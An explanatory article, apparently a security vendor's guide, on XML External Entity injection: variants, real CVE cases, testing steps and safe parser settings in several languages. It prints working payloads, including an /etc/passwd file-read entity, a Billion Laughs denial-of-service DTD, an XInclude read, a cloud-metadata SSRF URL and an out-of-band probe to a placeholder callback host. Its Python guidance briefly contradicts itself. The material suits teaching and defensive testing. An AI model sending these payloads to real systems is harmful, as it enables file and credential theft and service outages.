XXE (CWE-611) exploits XML parsers that resolve external entities, enabling file disclosure, SSRF, and RCE in some configurations. One parser flag eliminates the attack class.
TL;DR
file:///etc/passwd — one parser flag eliminates thisdisallow-doctype-decl: true (Java) / defusedxml (Python) / DtdProcessing.Prohibit (.NET)The XML specification includes a Document Type Definition (DTD) mechanism that allows XML documents to define named entity shortcuts — references that the parser substitutes with their defined value during processing. One variant, external entities, instructs the parser to fetch content from an external URI and inline it into the document. XML External Entity Injection (XXE, CWE-611) occurs when an application parses attacker-controlled XML and a misconfigured parser resolves these external entity references without restriction.
The attack surface is broader than most engineers expect. Beyond traditional REST APIs with Content-Type: application/xml, XXE exists in SOAP services, SAML SSO flows, file upload endpoints accepting SVG and Office formats (DOCX/XLSX/ODT), PDF processors handling XFA forms, RSS/Atom feed parsers, and XML-RPC endpoints. Any code path that passes untrusted XML through an unprotected parser is an XXE entry point.
OWASP classified XXE under A05:2021 (Security Misconfiguration) rather than A03 (Injection) because the root cause is a parser misconfiguration, not a language-level injection flaw. The XML specification itself is not broken — parsers simply ship with external entity resolution enabled by default in many frameworks, and developers rarely explicitly disable it. CVE-2025-66516 (Apache Tika, CVSS 10.0) and CVE-2024-34102 (Adobe Commerce CosmicSting, CVSS 9.8, approximately 170,000 affected stores) demonstrate that XXE remains actively exploited at critical severity in 2025.
The attack exploits the XML parser's entity resolution step. When the parser encounters &entityname; in document content, it looks up the entity definition and substitutes the resolved value. For external entities defined with the SYSTEM keyword, the parser fetches the specified URI and uses its contents as the substitution value.
The exploit chain proceeds in five steps:
<!DOCTYPE> declaration defining an external entity: <!ENTITY xxe SYSTEM "file:///etc/passwd">.&xxe; in the document body, it fetches file:///etc/passwd from the local filesystem.A minimal exploitation example:
POST /api/products HTTP/1.1
Host: shop.example.com
Content-Type: application/xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<productSearch>
<query>&xxe;</query>
</productSearch>HTTP/1.1 200 OK
Content-Type: application/json
{"results": "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n..."}The entity value replaces &xxe; in the <query> element, and the application reflects the parsed value in its response.
| Variant | Technique | Impact | Blind? |
|---|---|---|---|
| Classic file disclosure | SYSTEM "file:///etc/passwd" reflected in response | Local file read | No |
| SSRF via XXE | SYSTEM "http://169.254.169.254/..." | Internal network access, cloud metadata theft | Sometimes |
| Blind OOB | Two-stage parameter entity + external DTD | File exfiltration via DNS/HTTP callback | Yes |
| Error-based local DTD | Local DTD reuse, file content in error message | File read without OOB infrastructure | No (error channel) |
| XInclude injection | xi:include href="file:///etc/passwd" — no DOCTYPE needed | File read, bypasses DOCTYPE filters | No |
| SVG upload XXE | Malicious SVG processed by Batik/ImageMagick | Server file read via avatar/image upload | Sometimes |
| DOCX/XLSX XXE | XML files inside OOXML ZIP archive | Server file read when document is parsed | Sometimes |
| SAML XXE | XXE in SAML AuthnRequest or metadata | Auth bypass, credentials disclosure | Sometimes |
| Billion Laughs DoS | Recursive entity expansion (10^9 expansions) | Memory exhaustion, service crash | No |
Classic in-band XXE is the simplest form: the entity resolves a file:// URI and the content appears directly in the HTTP response. Any file readable by the application process user is accessible — /etc/passwd, application configuration files, private keys, database credentials.
SSRF via XXE pivots the parser as an HTTP client. Replacing file:// with http:// causes the parser to issue outbound HTTP requests. Against cloud instances, http://169.254.169.254/latest/meta-data/iam/security-credentials/ returns AWS IAM credentials without authentication. Internal services unreachable from the internet are reachable through the XML parser's outbound connection.
Blind OOB XXE applies when the server parses XML but does not return entity content in the HTTP response. Parameter entities make the server fetch an attacker-hosted DTD, which instructs the parser to exfiltrate file content to a second OOB endpoint. BreachVex uses unique out-of-band callback tokens per probe to correlate callbacks with specific payloads.
Error-based local DTD reuse is preferred when OOB infrastructure is unavailable. It references a DTD file that already exists on the target server, redefines a parameter entity within it, and crafts a chain triggering a parse error that contains the target file's contents. Linux systems commonly have /usr/share/yelp/dtd/docbookx.dtd; Windows systems have C:\Windows\System32\wbem\xml\CIM_DTD_V20.dtd.
XInclude injection bypasses defenses that block <!DOCTYPE patterns. XInclude uses namespace-qualified elements (xmlns:xi="http://www.w3.org/2001/XInclude") instead of DOCTYPE declarations. Disabling entity processing does not disable XInclude processing — both must be configured independently.
Billion Laughs DoS exploits recursive internal entity expansion to exhaust parser memory and CPU. No external network access or file:// URI is needed — the attack is self-contained within the DTD:
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
]>
<lolz>&lol4;</lolz>Four levels of expansion produce ~10,000 "lol" strings; ten levels produce ~10^10 — exhausting memory and CPU before the document finishes parsing. defusedxml blocks this by default; lxml requires huge_tree=False; Java requires setFeature("http://javax.xml.XMLConstants/feature/secure-processing", true).
CVE-2024-34102 — Adobe Commerce CosmicSting (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
The most widely exploited XXE vulnerability of 2024. Adobe Commerce's REST API accepted XML bodies without disabling external entity resolution. Sansec researchers demonstrated a five-step RCE chain: XXE reads app/etc/env.php → extracts crypt/key → forges admin JWT → admin REST API → code-on-demand RCE. Approximately 170,000 unpatched stores were vulnerable. Within 72 hours of public disclosure, threat actors compromised more than 4,275 e-commerce stores. The attack required no authentication and no user interaction. CVE-2024-34102 was presented at Black Hat USA 2024 and remains the canonical example of XXE chaining to full system compromise.
CVE-2025-66516 — Apache Tika PDF/XFA (CVSS 10.0)
Apache Tika is the most widely used server-side content extraction library, powering document ingestion in enterprise search, RAG pipelines, and file processing services. Versions before 3.2.2 processed XFA (XML Forms Architecture) content inside PDF documents without disabling external entity resolution. Any application using Tika to process attacker-supplied PDFs is vulnerable — including AI document ingestion pipelines, which represent a new high-value attack surface. Upgrade to Apache Tika 3.2.2 or later.
CVE-2024-22024 — Ivanti Connect Secure SAML (CVSS 8.3)
Ivanti's VPN product processed SAML AuthnRequests at /dana-na/auth/saml-sso.cgi without disabling external entity resolution. The same product was simultaneously vulnerable to CVE-2023-46805 (authentication bypass) — chained, these two CVEs enabled unauthenticated RCE against thousands of enterprise VPN concentrators deployed globally.
CVE-2024-45409 — ruby-saml (CVSS 10.0)
GitHub Security Lab discovered that ruby-saml (used by GitLab and thousands of Ruby applications) was vulnerable to SAML assertion forgery via XML parser differential. Nokogiri (signature verification) and REXML (claim extraction) parse the same XML document differently. An attacker crafts a document passing Nokogiri signature verification but presenting forged claims to REXML — achieving authentication bypass with no traditional injection in the document. CVE-2025-25292 is a second variant of the same differential, published in 2025.
HackerOne #1113539 — Rockstar Games XLSX Import (High)
An Excel import feature on the Rockstar Games web portal processed .xlsx files server-side. The attacker modified the XML files inside the OOXML ZIP archive to inject XXE payloads. When uploaded and processed, the server made OOB callbacks confirming XXE, then disclosed server-side file contents via in-band payloads.
HackerOne #409370 — Shopify SAML XXE (Critical)
Shopify's SAML SSO authentication flow parsed XML assertions without disabling external entity resolution. The attacker provided a crafted SAML response with an OOB XXE payload, which triggered file read callbacks from Shopify's application servers.
CosmicSting (CVE-2024-34102) pattern: XXE does not need to directly return file contents to cause critical impact. The RCE chain reads a configuration file, extracts a cryptographic key, and forges admin authentication tokens — a three-step path from XXE to full system compromise with no user interaction required. Always assess the full impact chain, not just the file read primitive.
Identify all XML entry points: REST APIs with Content-Type: application/xml, SOAP services (/ws/, /soap/, /services/), SAML SSO endpoints, file upload flows accepting SVG/DOCX/XLSX/ODT/PDF, RSS/Atom feeds, and XML-RPC.
Send a baseline probe to confirm XML acceptance:
<?xml version="1.0" encoding="UTF-8"?>
<root><data>test</data></root>A 415 Unsupported Media Type response means XML is rejected. Any other status indicates the endpoint processes XML.
Test entity expansion with an in-band canary:
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY test "XXECANARY123">]>
<root><data>&test;</data></root>If XXECANARY123 appears in the response, entity expansion is active.
Attempt SYSTEM entity file read:
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root><data>&xxe;</data></root>File contents in the response confirm classic in-band XXE.
For blind contexts, use Interactsh or Burp Collaborator:
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://YOUR-TOKEN.oast.pro/probe"> %xxe;]>
<root/>Test XInclude independently:
<root xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</root>Burp Suite Pro active scanner includes XXE checks using Burp Collaborator for OOB detection across XML endpoints, SOAP services, and file upload flows.
XXEinjector (Ruby) automates in-band and OOB XXE testing with payloads for multiple content types and file formats.
Nuclei templates (vulnerabilities/xxe/) include CVE-specific XXE templates. Custom templates can target application-specific XML endpoints.
Semgrep static rules python.lang.security.audit.xml-dtd and java.lang.security.audit.xxe flag unsafe parser configurations before deployment.
BreachVex detects XXE through a staged sequence of complementary checks: XML acceptance, entity-expansion canary, SYSTEM-entity file read, out-of-band callback correlation, and error-based local-DTD probing on known OS paths. Lower-signal results (DNS-only callbacks) are flagged for review, while data-exfiltration evidence is auto-reported.
Disabling external entity processing at the parser level eliminates classic XXE, blind OOB XXE, error-based XXE, and Billion Laughs DoS with a single configuration change. XInclude must be disabled separately.
// VULNERABLE — default DocumentBuilderFactory resolves external entities
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
DocumentBuilder db = dbf.newDocumentBuilder();
Document doc = db.parse(inputStream); // XXE possible
// SAFE — disable DOCTYPE entirely (blocks all XXE + DoS vectors)
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
dbf.setXIncludeAware(false); // also disables XInclude
dbf.setExpandEntityReferences(false);
DocumentBuilder db = dbf.newDocumentBuilder();
Document doc = db.parse(inputStream); // XXE blocked# NOTE: xml.etree.ElementTree raises ExpatError on external entity declarations —
# it does NOT resolve external entities (safe for XXE). However, it is vulnerable
# to Billion Laughs DoS via recursive internal entity expansion.
# Use defusedxml for belt-and-suspenders protection against both XXE and DoS.
import xml.etree.ElementTree as ET
tree = ET.parse(untrusted_xml) # safe for XXE; vulnerable to Billion Laughs DoS
# SAFE — defusedxml blocks all XXE patterns AND Billion Laughs DoS
from defusedxml import ElementTree as ET
tree = ET.parse(untrusted_xml) # all XXE patterns blocked by default
# SAFE — lxml with explicit hardening
from lxml import etree
parser = etree.XMLParser(
resolve_entities=False,
no_network=True,
load_dtd=False,
huge_tree=False, # blocks Billion Laughs DoS
)
tree = etree.fromstring(xml_bytes, parser=parser)// VULNERABLE — .NET 4.5.2 and earlier: XmlResolver defaults to XmlUrlResolver
var doc = new XmlDocument();
doc.Load(inputStream); // XXE possible on older .NET
// SAFE — explicitly null the resolver
var doc = new XmlDocument { XmlResolver = null };
doc.Load(inputStream); // blocks external entity resolution
// SAFE — XmlReader with DTD prohibition (preferred for streaming)
var settings = new XmlReaderSettings {
DtdProcessing = DtdProcessing.Prohibit,
XmlResolver = null,
MaxCharactersFromEntities = 0 // blocks Billion Laughs
};
using var reader = XmlReader.Create(inputStream, settings);// VULNERABLE — LIBXML_NOENT enables entity substitution
$dom = new DOMDocument();
$dom->loadXML($xml, LIBXML_NOENT); // LIBXML_NOENT is dangerous
// SAFE — LIBXML_NONET blocks network entities (does not block file://)
$dom = new DOMDocument();
$dom->loadXML($xml, LIBXML_NONET);
// SAFE (PHP < 8.0) — disable external entity loading globally
libxml_disable_entity_loader(true);
$dom = new DOMDocument();
$dom->loadXML($xml);
// PHP 8.0+: external entity loading is disabled by default for DOMDocument
// but SimpleXML and XMLReader still require explicit LIBXML_NONET flag// fast-xml-parser: 15M+ weekly downloads — most common Node.js XML library
// VULNERABLE — older default config may process entities
const { XMLParser } = require('fast-xml-parser');
const parser = new XMLParser();
const result = parser.parse(xmlString);
// SAFE — disable entity processing explicitly (fast-xml-parser >= 4.2.0)
const { XMLParser } = require('fast-xml-parser');
const parser = new XMLParser({
processEntities: false, // disables entity substitution
htmlEntities: false, // disables HTML entity processing
});
const result = parser.parse(xmlString);Egress filtering as defense-in-depth: Restricting outbound connections from XML-processing services blocks OOB data exfiltration for blind XXE and SSRF pivots. This does not prevent file:// reads, but it eliminates the attacker's ability to receive exfiltrated data via DNS/HTTP callbacks. ModSecurity CRS rules 942100-942130 add WAF-layer detection for XML attack patterns. Neither control replaces parser hardening — both add depth.
XXE injection occurs when an XML parser resolves external entity references embedded in attacker-controlled input. The XML DTD specification allows entities that reference external URIs — when the parser fetches those URIs, it enables file read (file:///etc/passwd), SSRF (http://internal-service/), and in some configurations RCE. CWE-611 classifies this as Improper Restriction of XML External Entity Reference. OWASP absorbed XXE into A05:2021 (Security Misconfiguration) because vulnerable parsers almost always ship misconfigured, not broken.
XXE and SSRF are distinct vulnerability classes that chain together. XXE is an XML parsing flaw that forces the server to resolve an external entity pointing to any URI scheme (file://, http://, ftp://, gopher://). When that URI points to an internal service, the XXE becomes a SSRF pivot — the XML parser acts as the HTTP client. SSRF can also occur independently without any XML involvement. XXE-to-SSRF is a chain, not a synonym.
XXE is classified under OWASP Top 10 A05:2021 — Security Misconfiguration. Prior to the 2021 update, XXE had its own category (A04:2017). The reclassification reflects that XXE is not a design flaw in the XML specification itself, but a configuration failure — parsers ship with external entity resolution enabled by default in many frameworks, and developers fail to disable it.
Java's DocumentBuilderFactory and SAXParserFactory (pre-Java 17 defaults), PHP's DOMDocument when using LIBXML_NOENT flag, Python's stdlib xml.etree and xml.minidom (all versions), Node.js libxmljs2 without explicit noent:false, .NET XmlDocument with XmlResolver not set to null, and Ruby's Nokogiri with noent option. Safe alternatives: Java (disable DOCTYPE), Python (defusedxml), PHP (LIBXML_NONET without LIBXML_NOENT), .NET (XmlReaderSettings with DtdProcessing.Prohibit).
XXE can chain to RCE through several paths: (1) CosmicSting (CVE-2024-34102) — XXE reads app/etc/env.php, extracts crypt key, forges admin JWT, then code-on-demand RCE; (2) XSLT extension functions — PHP XSL with registerPHPFunctions() allows XSLT to call arbitrary PHP functions including system(); (3) SAML XXE reads Kerberos keytab for offline cracking to AD admin; (4) XXE reads database credentials for application-layer privilege escalation. Direct RCE from XXE alone is rare — it usually requires a vulnerable application logic chain.
Blind OOB (Out-of-Band) XXE occurs when the XML parser resolves external entities but the server does not return entity content in the HTTP response. Attackers use two-stage parameter entity chains: the target server fetches an attacker-hosted DTD, which instructs the parser to exfiltrate file content to a second OAST callback URL. Tools like Interactsh (oast.pro) or Burp Collaborator capture the DNS and HTTP callbacks. DNS-only callback indicates POTENTIAL (confidence 0.30); HTTP with data confirms CONFIRMED (0.98).
Error-based local DTD reuse is an XXE technique that requires no external OOB infrastructure. It references a DTD file already on the target server filesystem (e.g., /usr/share/yelp/dtd/docbookx.dtd on Linux), redefines a parameter entity from that DTD, and crafts a chain that causes the parser to include file content in an error message. This technique is valuable in environments with strict egress filtering blocking OOB callbacks.
1. Send a benign XML probe — if not 415, XML is accepted. 2. Inject a local entity canary: <!DOCTYPE foo [<!ENTITY test 'XXECANARY'>]><root>&test;</root> — if XXECANARY appears in response, entity expansion is active. 3. Test SYSTEM entity: file:///etc/passwd in entity value — file contents confirm classic XXE. 4. For blind: use Interactsh URL in entity value and monitor for DNS/HTTP callbacks. 5. Test XInclude separately with xi:include element.
XInclude is a W3C standard for XML document composition that allows including external files using xi:include elements — without requiring a DOCTYPE declaration. An attacker who can inject XML content can use XInclude to read files, bypassing defenses that block DOCTYPE-based XXE. XInclude must be explicitly disabled via setXIncludeAware(false) in Java — disabling DOCTYPE alone is insufficient.
File upload XXE occurs when an application accepts XML-based file formats (SVG, DOCX, XLSX, ODT, PDF with XFA) and processes them server-side. SVG files are processed by Apache Batik. DOCX/XLSX files contain XML inside OOXML ZIP archives processed by Apache POI or openpyxl. PDF with XFA forms is processed by Apache Tika (CVE-2025-66516, CVSS 10.0). The attack requires no modification of HTTP headers — only the file content matters.
Disable DOCTYPE processing entirely at the parser level. In Java JAXP: setFeature('http://apache.org/xml/features/disallow-doctype-decl', true). In Python: use defusedxml instead of stdlib xml modules — it blocks all XXE patterns by default. In .NET: set DtdProcessing = DtdProcessing.Prohibit and XmlResolver = null. In PHP: never pass LIBXML_NOENT; use LIBXML_NONET. This single configuration change eliminates classic XXE, blind OOB XXE, error-based XXE, and Billion Laughs DoS simultaneously. XInclude must be disabled separately.
By CVSS severity: CVE-2025-66516 (Apache Tika PDF/XFA, CVSS 10.0), CVE-2024-45409 (ruby-saml SAML bypass, CVSS 10.0), CVE-2024-34102 (Adobe Commerce CosmicSting, CVSS 9.8 — most exploited XXE of 2024, 170,000+ affected stores), CVE-2025-49493 (Akamai CloudTest SOAP, CVSS 9.1), CVE-2024-22024 (Ivanti Connect Secure SAML, CVSS 8.3), CVE-2025-13096 (IBM BAW, CVSS 8.2), CVE-2024-30043 (SharePoint, CVSS 6.5).
Yes — JSON parsers do not implement the DTD/entity system that enables XXE. If an application can migrate from XML to JSON for its API, XXE is eliminated at the architecture level. However, XML cannot be avoided in SAML assertions, Office document formats (DOCX/XLSX), SVG images, RSS/Atom feeds, SOAP services, and enterprise integration protocols. For those contexts, parser hardening is mandatory.